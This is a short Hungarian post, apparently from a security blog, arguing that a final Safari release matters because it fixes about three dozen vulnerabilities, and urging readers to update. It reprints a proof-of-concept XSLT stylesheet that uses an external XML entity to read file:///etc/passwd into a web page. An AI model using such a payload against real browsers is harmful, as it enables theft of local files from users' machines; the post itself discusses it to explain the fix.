"A fülek elhelyezését megváltoztatták, de egyébként alig történt változás a tesztverzióhoz képest."
Nos, ezzel azért vitatkoznék:
A végleges verzió kb. három tucat, több esetben kritikus vagy extrém kritikus súlyosságúnak minősített biztonsági problémát orvosol. Ezek között a már jól megszokott, WebKit-et, CoreGraphics-t és libxml-t érintő, kódfuttatásra alkalmas sebezhetőségeken túl megtalálhatók még olyan ínyencségek is, mint a Chris Evans által felfedezett, helyi fájlok olvasását lehetővé tevő problémák.
Ezek közül a leguniverzálisabb az alábbi stíluslap megadásával használható ki:
<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ] >
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/
<xsl:template match="/">
<html>
<body>
Below you should see the content of a local file, stolen by this evil web page.
<p/>
&ent;
<script>
alert(document.body.innerHTML);
</script>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
A böngészőben ezen kívül megjelent egy Clickjacking-védelmi technológia is, valamint számos kevésbé súlyos, pl. cross-site scriptingre alkalmat adó hiba is javításra kerül. Így az új verzióra történő frissítés nem csak azoknak fontos, akik eddig nem voltak megelégedve a "fülek elhelyezésével".
Az Apple (a Microsofttal együtt) egyébként még számos termékéhez kiadott a mai napon javításokat, ezekről - ha minden jól megy - egy későbbi posztban számolok majd be.